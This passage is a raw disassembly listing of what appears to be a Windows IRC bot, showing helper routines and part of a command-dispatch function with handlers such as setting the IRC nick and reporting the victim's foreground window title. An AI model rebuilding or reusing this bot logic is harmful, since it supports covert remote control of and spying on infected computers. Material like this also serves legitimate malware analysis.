call ds:dword_4170B4 ; CreateThread
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A2C7
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
jmp short locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A2C7: ; CODE XREF: sub_40A1A7+113�j
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
locret_40A2D0: ; CODE XREF: sub_40A1A7+1B�j
; sub_40A1A7+34�j ...
leave
retn
sub_40A1A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A2D2 proc near ; CODE XREF: .text:0040A4D4�p
var_111C = dword ptr -111Ch
var_1118 = dword ptr -1118h
var_1114 = byte ptr -1114h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 111Ch
call sub_416BC0
mov eax, [ebp+arg_0]
add eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 104h
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
push offset dword_41966C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
add esp, 14h
push 2710h
push 0
push offset a43 ; "43"
mov eax, [ebp+arg_0]
add eax, 104h
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A339
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A339: ; CODE XREF: sub_40A2D2+5E�j
mov eax, [ebp+arg_0]
add eax, 4
push eax
push offset aS_1 ; "%s\r\n"
lea eax, [ebp+var_114]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_114]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_8]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A38F
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A38F: ; CODE XREF: sub_40A2D2+AB�j
push 1000h
lea eax, [ebp+var_1114]
push eax
push [ebp+var_8]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_40A3B5
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_40A3C5
loc_40A3B5: ; CODE XREF: sub_40A2D2+DB�j
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A3C5: ; CODE XREF: sub_40A2D2+E1�j
lea eax, [ebp+var_1114]
mov [ebp+var_10], eax
loc_40A3CE: ; CODE XREF: sub_40A2D2:loc_40A492�j
mov eax, [ebp+var_10]
mov [ebp+var_111C], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A3E9
jmp loc_40A497
; ---------------------------------------------------------------------------
loc_40A3E9: ; CODE XREF: sub_40A2D2+110�j
push [ebp+var_111C]
call sub_407B5E
pop ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40A41B
push offset dword_418F4C
push [ebp+var_111C]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40A442
loc_40A41B: ; CODE XREF: sub_40A2D2+131�j
mov eax, [ebp+var_111C]
lea ecx, [ebp+var_1114]
cmp eax, ecx
jz short loc_40A440
push offset dword_41965C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A440: ; CODE XREF: sub_40A2D2+157�j
jmp short loc_40A458
; ---------------------------------------------------------------------------
loc_40A442: ; CODE XREF: sub_40A2D2+147�j
push [ebp+var_111C]
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A458: ; CODE XREF: sub_40A2D2:loc_40A440�j
push 3E8h
call ds:dword_41709C ; Sleep
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax+4]
mov [ebp+var_1118], eax
push offset dword_41E2D8
call sub_409C7A
pop ecx
cmp [ebp+var_1118], 0
jz short loc_40A492
jmp short loc_40A497
; ---------------------------------------------------------------------------
loc_40A492: ; CODE XREF: sub_40A2D2+1BC�j
jmp loc_40A3CE
; ---------------------------------------------------------------------------
loc_40A497: ; CODE XREF: sub_40A2D2+112�j
; sub_40A2D2+1BE�j
push [ebp+var_8]
call sub_40538D
pop ecx
mov al, 1
locret_40A4A2: ; CODE XREF: sub_40A2D2+62�j
; sub_40A2D2+B8�j ...
leave
retn
sub_40A2D2 endp
; ---------------------------------------------------------------------------
loc_40A4A4: ; DATA XREF: sub_40A50E+A1�o
push ebp
mov ebp, esp
sub esp, 3A8h
push 3A7h
push dword ptr [ebp+8]
lea eax, [ebp-3A8h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
lea eax, [ebp-3A8h]
push eax
call sub_40A2D2
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40A4FC
lea eax, [ebp-2A4h]
push eax
push offset dword_419698
lea eax, [ebp-1A4h]
push eax
call sub_40D53F
add esp, 0Ch
loc_40A4FC: ; CODE XREF: .text:0040A4DF�j
push dword ptr [ebp-3A8h]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A50E proc near ; CODE XREF: sub_40A9CF+FE3�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_40A51D
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A51D: ; CODE XREF: sub_40A50E+8�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A536
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A536: ; CODE XREF: sub_40A50E+21�j
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A562
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40A586
; ---------------------------------------------------------------------------
loc_40A562: ; CODE XREF: sub_40A50E+3D�j
push offset dword_4196D4
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_4105FB
pop ecx
loc_40A586: ; CODE XREF: sub_40A50E+52�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4196B4
push 0
push [ebp+var_4]
push offset loc_40A4A4
call sub_4095A4
add esp, 18h
locret_40A5BC: ; CODE XREF: sub_40A50E+A�j
; sub_40A50E+23�j
leave
retn
sub_40A50E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5BE proc near ; CODE XREF: sub_40A5BE+32�p
; sub_40A5BE+70�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A603
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A5DD
mov al, 1
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5DD: ; CODE XREF: sub_40A5BE+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A5FC
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5FC: ; CODE XREF: sub_40A5BE+28�j
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A603: ; CODE XREF: sub_40A5BE+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A614
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A614: ; CODE XREF: sub_40A5BE+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A63A
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A63A: ; CODE XREF: sub_40A5BE+64�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A65B
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A65B: ; CODE XREF: sub_40A5BE+85�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69E
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A67C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A687
loc_40A67C: ; CODE XREF: sub_40A5BE+B1�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69A
loc_40A687: ; CODE XREF: sub_40A5BE+BC�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69A: ; CODE XREF: sub_40A5BE+C7�j
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69E: ; CODE XREF: sub_40A5BE+A6�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A6E7
and [ebp+var_4], 0
jmp short loc_40A6B6
; ---------------------------------------------------------------------------
loc_40A6AF: ; CODE XREF: sub_40A5BE:loc_40A6E5�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A6B6: ; CODE XREF: sub_40A5BE+EF�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A6D4
mov al, 1
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6D4: ; CODE XREF: sub_40A5BE+110�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A6E5
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6E5: ; CODE XREF: sub_40A5BE+121�j
jmp short loc_40A6AF
; ---------------------------------------------------------------------------
loc_40A6E7: ; CODE XREF: sub_40A5BE+E9�j
xor al, al
locret_40A6E9: ; CODE XREF: sub_40A5BE+1A�j
; sub_40A5BE+39�j ...
leave
retn
sub_40A5BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A6EB proc near ; CODE XREF: sub_4097A7+10A�p
; sub_4098F3+155�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A730
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A70A
mov al, 1
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A70A: ; CODE XREF: sub_40A6EB+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A729
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A729: ; CODE XREF: sub_40A6EB+28�j
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A730: ; CODE XREF: sub_40A6EB+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A741
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A741: ; CODE XREF: sub_40A6EB+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A767
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A767: ; CODE XREF: sub_40A6EB+64�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 41h
jl short loc_40A77D
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 5Ah
jle short loc_40A793
loc_40A77D: ; CODE XREF: sub_40A6EB+85�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 61h
jl short loc_40A7BC
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 7Ah
jg short loc_40A7BC
loc_40A793: ; CODE XREF: sub_40A6EB+90�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
xor eax, 20h
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A7BC
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7BC: ; CODE XREF: sub_40A6EB+9B�j
; sub_40A6EB+A6�j ...
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A7DD
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7DD: ; CODE XREF: sub_40A6EB+DA�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A820
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A7FE
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A809
loc_40A7FE: ; CODE XREF: sub_40A6EB+106�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A81C
loc_40A809: ; CODE XREF: sub_40A6EB+111�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A81C: ; CODE XREF: sub_40A6EB+11C�j
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A820: ; CODE XREF: sub_40A6EB+FB�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A869
and [ebp+var_4], 0
jmp short loc_40A838
; ---------------------------------------------------------------------------
loc_40A831: ; CODE XREF: sub_40A6EB:loc_40A867�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A838: ; CODE XREF: sub_40A6EB+144�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A856
mov al, 1
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A856: ; CODE XREF: sub_40A6EB+165�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A867
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A867: ; CODE XREF: sub_40A6EB+176�j
jmp short loc_40A831
; ---------------------------------------------------------------------------
loc_40A869: ; CODE XREF: sub_40A6EB+13E�j
xor al, al
locret_40A86B: ; CODE XREF: sub_40A6EB+1A�j
; sub_40A6EB+39�j ...
leave
retn
sub_40A6EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A86D proc near ; CODE XREF: sub_40A8AD+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_4], 1
cmp [ebp+arg_4], 0
jnz short loc_40A884
push 1
pop eax
jmp short locret_40A8AB
; ---------------------------------------------------------------------------
loc_40A884: ; CODE XREF: sub_40A86D+10�j
mov [ebp+var_8], 1
jmp short loc_40A894
; ---------------------------------------------------------------------------
loc_40A88D: ; CODE XREF: sub_40A86D+39�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40A894: ; CODE XREF: sub_40A86D+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jg short loc_40A8A8
mov eax, [ebp+var_4]
imul eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_40A88D
; ---------------------------------------------------------------------------
loc_40A8A8: ; CODE XREF: sub_40A86D+2D�j
mov eax, [ebp+var_4]
locret_40A8AB: ; CODE XREF: sub_40A86D+15�j
leave
retn
sub_40A86D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A8AD proc near ; CODE XREF: sub_406509+26�p
; sub_40A9CF+193F�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push esi
push edi
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_20], 0
mov esi, offset aAbcdef ; "abcdef"
lea edi, [ebp+var_1C]
movsd
movsw
movsb
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 30h
jnz short loc_40A90C
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 78h
jz short loc_40A905
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 58h
jnz short loc_40A90C
loc_40A905: ; CODE XREF: sub_40A8AD+48�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_40A90C: ; CODE XREF: sub_40A8AD+33�j
; sub_40A8AD+56�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_20]
mov [ebp+var_14], eax
jmp short loc_40A927
; ---------------------------------------------------------------------------
loc_40A920: ; CODE XREF: sub_40A8AD+116�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_40A927: ; CODE XREF: sub_40A8AD+71�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_28]
jge loc_40A9C8
mov eax, [ebp+arg_0]
add eax, [ebp+var_14]
movsx eax, byte ptr [eax]
push eax
call sub_416DE4 ; tolower
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 30h
jl short loc_40A95D
cmp [ebp+var_8], 39h
jg short loc_40A95D
mov eax, [ebp+var_8]
sub eax, 30h
mov [ebp+var_10], eax
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A95D: ; CODE XREF: sub_40A8AD+9D�j
; sub_40A8AD+A3�j
cmp [ebp+var_8], 61h
jl short loc_40A99C
cmp [ebp+var_8], 66h
jg short loc_40A99C
and [ebp+var_24], 0
jmp short loc_40A976
; ---------------------------------------------------------------------------
loc_40A96F: ; CODE XREF: sub_40A8AD:loc_40A998�j
mov eax, [ebp+var_24]
inc eax
mov [ebp+var_24], eax
loc_40A976: ; CODE XREF: sub_40A8AD+C0�j
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
test eax, eax
jz short loc_40A99A
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
cmp [ebp+var_8], eax
jnz short loc_40A998
mov eax, [ebp+var_24]
add eax, 0Ah
mov [ebp+var_10], eax
loc_40A998: ; CODE XREF: sub_40A8AD+E0�j
jmp short loc_40A96F
; ---------------------------------------------------------------------------
loc_40A99A: ; CODE XREF: sub_40A8AD+D3�j
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A99C: ; CODE XREF: sub_40A8AD+B4�j
; sub_40A8AD+BA�j
xor eax, eax
jmp short loc_40A9CB
; ---------------------------------------------------------------------------
loc_40A9A0: ; CODE XREF: sub_40A8AD+AE�j
; sub_40A8AD:loc_40A99A�j
mov eax, [ebp+var_28]
sub eax, [ebp+var_14]
dec eax
push eax
push 10h
call sub_40A86D
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
imul eax, [ebp+var_10]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
jmp loc_40A920
; ---------------------------------------------------------------------------
loc_40A9C8: ; CODE XREF: sub_40A8AD+80�j
mov eax, [ebp+var_C]
loc_40A9CB: ; CODE XREF: sub_40A8AD+F1�j
pop edi
pop esi
leave
retn
sub_40A8AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9CF proc near ; CODE XREF: sub_40D871+C95�p
; sub_40D871+D9C�p
var_6424 = dword ptr -6424h
var_6420 = dword ptr -6420h
var_641C = dword ptr -641Ch
var_6418 = dword ptr -6418h
var_6414 = dword ptr -6414h
var_6410 = dword ptr -6410h
var_640C = dword ptr -640Ch
var_6408 = dword ptr -6408h
var_6404 = dword ptr -6404h
var_6400 = dword ptr -6400h
var_63FC = dword ptr -63FCh
var_63F8 = dword ptr -63F8h
var_63F4 = dword ptr -63F4h
var_63F0 = dword ptr -63F0h
var_63EC = dword ptr -63ECh
var_63E8 = dword ptr -63E8h
var_63E4 = dword ptr -63E4h
var_63E0 = dword ptr -63E0h
var_63DC = dword ptr -63DCh
var_63D8 = dword ptr -63D8h
var_63D4 = dword ptr -63D4h
var_63D0 = dword ptr -63D0h
var_63CC = dword ptr -63CCh
var_63C8 = dword ptr -63C8h
var_63C4 = dword ptr -63C4h
var_63C0 = dword ptr -63C0h
var_63BC = dword ptr -63BCh
var_63B8 = dword ptr -63B8h
var_63B4 = word ptr -63B4h
var_63B2 = word ptr -63B2h
var_63B0 = dword ptr -63B0h
var_63A4 = dword ptr -63A4h
var_63A0 = byte ptr -63A0h
var_639C = dword ptr -639Ch
var_6398 = byte ptr -6398h
var_6397 = byte ptr -6397h
var_6396 = byte ptr -6396h
var_6395 = byte ptr -6395h
var_6394 = byte ptr -6394h
var_6393 = byte ptr -6393h
var_6392 = byte ptr -6392h
var_6391 = byte ptr -6391h
var_6390 = byte ptr -6390h
var_638F = byte ptr -638Fh
var_638E = byte ptr -638Eh
var_638D = byte ptr -638Dh
var_638C = dword ptr -638Ch
var_6388 = byte ptr -6388h
var_5F84 = dword ptr -5F84h
var_5F80 = byte ptr -5F80h
var_5B7C = dword ptr -5B7Ch
var_5B78 = dword ptr -5B78h
var_5B74 = byte ptr -5B74h
var_5A70 = dword ptr -5A70h
var_5A6C = dword ptr -5A6Ch
var_5A68 = dword ptr -5A68h
var_5A64 = byte ptr -5A64h
var_1A64 = dword ptr -1A64h
var_1A60 = byte ptr -1A60h
var_A60 = dword ptr -0A60h
var_A5C = byte ptr -0A5Ch
var_A38 = byte ptr -0A38h
var_A30 = dword ptr -0A30h
var_A2C = dword ptr -0A2Ch
var_A28 = dword ptr -0A28h
var_A24 = dword ptr -0A24h
var_A20 = dword ptr -0A20h
var_A1C = dword ptr -0A1Ch
var_A18 = byte ptr -0A18h
var_9F8 = dword ptr -9F8h
var_9F4 = byte ptr -9F4h
var_9EF = byte ptr -9EFh
var_9EA = byte ptr -9EAh
var_9E5 = byte ptr -9E5h
var_9E0 = byte ptr -9E0h
var_9DB = byte ptr -9DBh
var_9D8 = byte ptr -9D8h
var_9A4 = byte ptr -9A4h
var_970 = byte ptr -970h
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_8D3 = byte ptr -8D3h
var_8D2 = byte ptr -8D2h
var_8CD = byte ptr -8CDh
var_8CC = byte ptr -8CCh
var_8C7 = byte ptr -8C7h
var_8C6 = byte ptr -8C6h
var_8C1 = byte ptr -8C1h
var_8C0 = byte ptr -8C0h
var_8BB = byte ptr -8BBh
var_8B8 = byte ptr -8B8h
var_8A0 = byte ptr -8A0h
var_720 = dword ptr -720h
var_71C = dword ptr -71Ch
var_718 = byte ptr -718h
var_59B = byte ptr -59Bh
var_598 = byte ptr -598h
var_418 = dword ptr -418h
var_414 = byte ptr -414h
var_214 = byte ptr -214h
var_1F0 = byte ptr -1F0h
var_1CC = byte ptr -1CCh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
var_183 = byte ptr -183h
var_83 = dword ptr -83h
var_7F = byte ptr -7Fh
var_19 = byte ptr -19h
var_B = byte ptr -0Bh
var_8 = byte ptr -8
var_5 = dword ptr -5
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, 6424h
call sub_416BC0
push esi
push edi
mov eax, [ebp+arg_14]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_1A8], eax
push [ebp+arg_0]
lea eax, [ebp+var_1A4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_183]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+arg_C]
mov [ebp+var_83], eax
push 7Ah
push [ebp+arg_10]
lea eax, [ebp+var_7F]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov [ebp+var_5], 1
mov eax, [ebp+var_1A8]
sub eax, dword_419F18
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AA59
lea eax, [ebp+var_1A4]
push eax
call sub_415AF0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AA59: ; CODE XREF: sub_40A9CF+76�j
mov eax, [ebp+var_1A8]
sub eax, dword_419F0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AACF
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40AAAC
lea eax, [ebp+var_214]
push eax
lea eax, [ebp+var_1F0]
push eax
lea eax, [ebp+var_1CC]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp+var_1CC]
push eax
push offset aNickS ; "NICK %s"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AAAC: ; CODE XREF: sub_40A9CF+A6�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D7E5
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset aNickS ; "NICK %s"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AACF: ; CODE XREF: sub_40A9CF+9D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419EF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB21
push 200h
lea eax, [ebp+var_414]
push eax
call ds:dword_4171D8 ; GetForegroundWindow
push eax
call ds:dword_4171E4 ; GetWindowTextA
test eax, eax
jle short loc_40AB1C
lea eax, [ebp+var_414]
push eax
push offset dword_419EDC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AB1C: ; CODE XREF: sub_40A9CF+130�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB21: ; CODE XREF: sub_40A9CF+113�j
mov eax, [ebp+var_1A8]
sub eax, dword_419ED0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB56
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4077DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB56: ; CODE XREF: sub_40A9CF+165�j
mov eax, [ebp+var_1A8]
sub eax, dword_419EC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AC89
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AC84
push 180h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_598]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_598]
push eax
